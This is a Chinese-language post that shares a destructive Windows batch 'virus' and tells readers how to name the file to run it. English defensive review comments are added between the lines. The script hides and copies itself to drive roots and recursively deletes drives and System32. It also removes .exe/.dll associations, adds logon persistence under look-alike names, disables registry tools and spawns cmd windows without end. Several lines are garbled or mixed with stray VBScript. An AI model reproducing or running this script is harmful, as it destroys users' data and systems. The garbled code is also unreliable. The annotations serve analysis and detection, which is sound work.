注意若您想运行请把钦件名设为 rund1132
以下为代码
:: Reviewer annotations (defensive analysis). Lines starting with "::" are
:: comments added for review; every command line below is unchanged.
:: Overall: a destructive Windows batch script that tries to hide and copy
:: itself, delete data, remove file-association registry keys, add logon
:: persistence, change Internet Explorer settings and policy values, and
:: finally spawn cmd windows in an endless loop.
:: NOTE(review): several lines look garbled (registry and file paths without
:: separators, fragments written in another scripting syntax), so read this
:: for behaviour patterns and do not build detections on its exact strings.

:: --- Self-hiding ---
:: %0 is the path of the running script; +h sets its hidden attribute.
attrib +h %0
:: No file argument is given on the next two lines; presumably they act on
:: files in the current directory - confirm before relying on this.
attrib -h
attrib +h

:: --- Data destruction ---
:: rd with /s /q removes directory trees recursively without prompting; the
:: targets are the roots of drives c: through g:.
:: Detection: cmd.exe issuing recursive rd/del against a drive root.
:: Mitigation: offline or versioned backups, and not running unknown scripts
:: from an administrative session.
rd/s/q c:\
rd/s/q d:\
rd/s/q e:\
rd/s/q f:\
rd/s/q g:\

:: --- Self-propagation ---
:: Copies the script itself (%0) to several drive roots; the page's own
:: explanation calls this the infection step. The first destination is not a
:: plain path and looks garbled.
:: Detection: a new script file appearing at the root of multiple volumes.
copy %0 f:\assoc.exe=txtfile
copy %0 E:\
copy %0 c:\
copy %0 d:\

:: --- Shell and file-association tampering ---
:: Targets explorer.exe (the desktop shell process) with /f (force); both
:: output streams are discarded so nothing is shown to the user.
taskill /im explorer.exe /f >nul 2>nul
@ECHO OFF
:: reg delete aimed at the .exe and .dll entries under HKCR, each launched in
:: a separate window via START.
:: Detection: reg.exe invoked with "delete" against HKCR extension keys.
START reg delete HKCR/.exe
START reg delete HKCR/.dll
@echo

:: --- More deletion ---
:: del with /f /q /s: force, quiet, recursive; targets the system drive and
:: the System32 directory.
del %systemdrive%\*.*/f/q/s
del /s /f /q C:\Windows\system32

:: --- Second-stage batch file ---
:: The echo redirections below (here and further down) write a second batch
:: file, hartlell.bat, line by line: "@echo off", "break off", a shutdown
:: command with -r (restart), and "end".
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
:: The next five lines are not batch syntax; they resemble a VBScript
:: Sleep/SendKeys loop and were presumably pasted from another script.
set wahshell =wscreateobject<"wscip.shell">
do
wscipt.sleep 100
wshshell.sendkeys"~<enter>"
loop
echo shutdown -r -t 11-f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat

:: --- Persistence for the second-stage file ---
:: Two reg add commands (each split over two lines) aimed at the
:: ...\CurrentVersion\Run keys of the machine and the current user, with
:: hartlell.bat as the data, i.e. the restart script would run at logon.
:: Detection: any reg.exe or API write to a Run key that points at a
:: .bat/.cmd file; autorun-inventory tooling lists such entries.
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun
/v startapi /t reg_sz/d c:windowshartlell.bat /f
reg add hkey-current_usersoftwaremicrosoftwindowscurrentversionrun
/v/t reg_sz/d c:windowshartlell.bat /f
:: PAUSE waits for a key press before the script continues.
PAUSE
@echo off

:: --- Browser and policy changes (current user) ---
:: Sets the Internet Explorer "Start Page" value to a placeholder URL.
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.xxxx.com" /f
:: Policy value "HomePage"=1 under the IE Control Panel policies key;
:: presumably this stops the user from changing the home page back.
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /f
:: DisableRegistryTools=1 blocks the registry editor for this user, which
:: hinders manual clean-up. Recovery usually means resetting the value from
:: another account, Group Policy, or an offline registry edit.
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f

:: --- Persistence for the script itself ---
:: Adds a per-user Run value named "ctfmom" pointing at rund1132.bat under
:: %windir%\System32. Both names resemble legitimate Windows components
:: (look-alike naming), so review Run entries by target path and file type,
:: not by how familiar the name looks.
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "ctfmom" /d "%windir%\System32\rund1132.bat" /f

:: --- Resource exhaustion ---
:: Endless loop: each pass opens another cmd window and jumps back to the
:: label, with no exit condition.
:: Detection: one parent process creating cmd.exe children at a high rate.
:start
start cmd
goto start
解释一下:下面这几行把脚本自身(%0 即脚本本身的路径)复制到各个盘的根目录,也就是病毒的感染(自我复制)部分:
copy %0 f:\
copy %0 E:\
copy %0 c:\
copy %0 d:\
设为开机启动项reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "ctfmom" /d "%windir%\System32\rund1132.bat" /f ctfmom是开机启动项名称 rund1132是钦件名称。 都可以替换
若您不想改名为rund1132请将。 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "ctfmom" /d "%windir%\System32\rund1132.bat" /f 中的rund1132换为您想要的名字,注意不要去掉引号!!!